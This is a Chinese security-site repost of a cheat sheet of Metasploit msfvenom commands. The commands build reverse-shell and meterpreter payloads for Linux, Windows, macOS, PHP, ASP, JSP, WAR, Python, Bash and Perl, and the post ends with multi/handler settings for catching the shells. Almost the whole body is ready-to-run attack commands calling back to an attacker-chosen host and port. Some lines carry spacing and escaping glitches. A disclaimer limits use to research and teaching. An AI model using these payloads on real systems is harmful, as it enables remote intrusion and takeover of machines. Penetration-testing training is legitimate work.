收藏Metasploit payload

admin
admin
admin
139022
文章
114
评论
2022年3月28日09:27:11评论76 views字数 1830阅读6分6秒阅读模式


        通常 Metasploit 最有用(对于初学者来说被低估)的功能之一是 msfpayload 模块。可以使用此模块创建多个有效负载,它有助于在几乎任何情况下为您提供外壳。对于这些有效负载中的每一个,您都可以进入 msfconsole 并选择exploit/multi/handler。为使用的相关负载运行“设置负载”并配置所有必要的选项(LHOST、LPORT 等)。执行并等待有效负载运行。对于下面的示例,它是不言自明的,但 LHOST 应填写您的 IP 地址(如果在网络内进行攻击,则为 LAN IP,如果通过 Internet 进行攻击,则为 WAN IP),并且 LPORT 应该是您希望重新连接的端口。


Linux

msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f elf > shell.elf


Windows

msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f exe > shell.exe


Mac

msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f macho > shell.macho


PHP

msfvenom -p php / meterpreter_reverse_tcp LHOST = <你的 IP 地址>  LPORT = <你的连接端口>  -f raw > shell.php cat shell.php | pbcopy &&  echo  '<?php'  |  tr  -d  'n'  > shell.php && pbpaste >> shell.php


ASP

msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f asp > shell.asp


JSP

msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f raw > shell.jsp


War

msfvenom -p java / jsp_shell_reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f war > shell.war


Python

msfvenom -p cmd / unix / reverse_python LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.py


Bash

msfvenom -p cmd / unix / reverse_bash LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f raw > shell.sh


Perl

msfvenom -p cmd / unix / reverse_perl LHOST = <你的 IP 地址>  LPORT = <你要连接的端口>  -f raw > shell.pl


Linux Based Shellcode

msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>


Windows Based Shellcode

msfvenom -p windows / meterpreter / reverse_tcp LHOST = <您的IP地址>  LPORT = <您要连接的端口>  -f  <语言>


Mac Based Shellcode

msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <您的 IP 地址>  LPORT = <您要连接的端口>  -f  <语言>


设置 Metasploit 以接收传入的 shell


use exploit/multi/handlerset PAYLOAD <Payload name>set LHOST <LHOST value>set LPORT <LPORT value>set ExitOnSession falseexploit -j -z


完成所需的值后,以下命令将执行您的处理程序 – 'msfconsole -L -r '



收藏Metasploit payload


本文始发于微信公众号(Khan安全攻防实验室):收藏Metasploit payload

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年3月28日09:27:11
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   收藏Metasploit payloadhttps://cn-sec.com/archives/534337.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息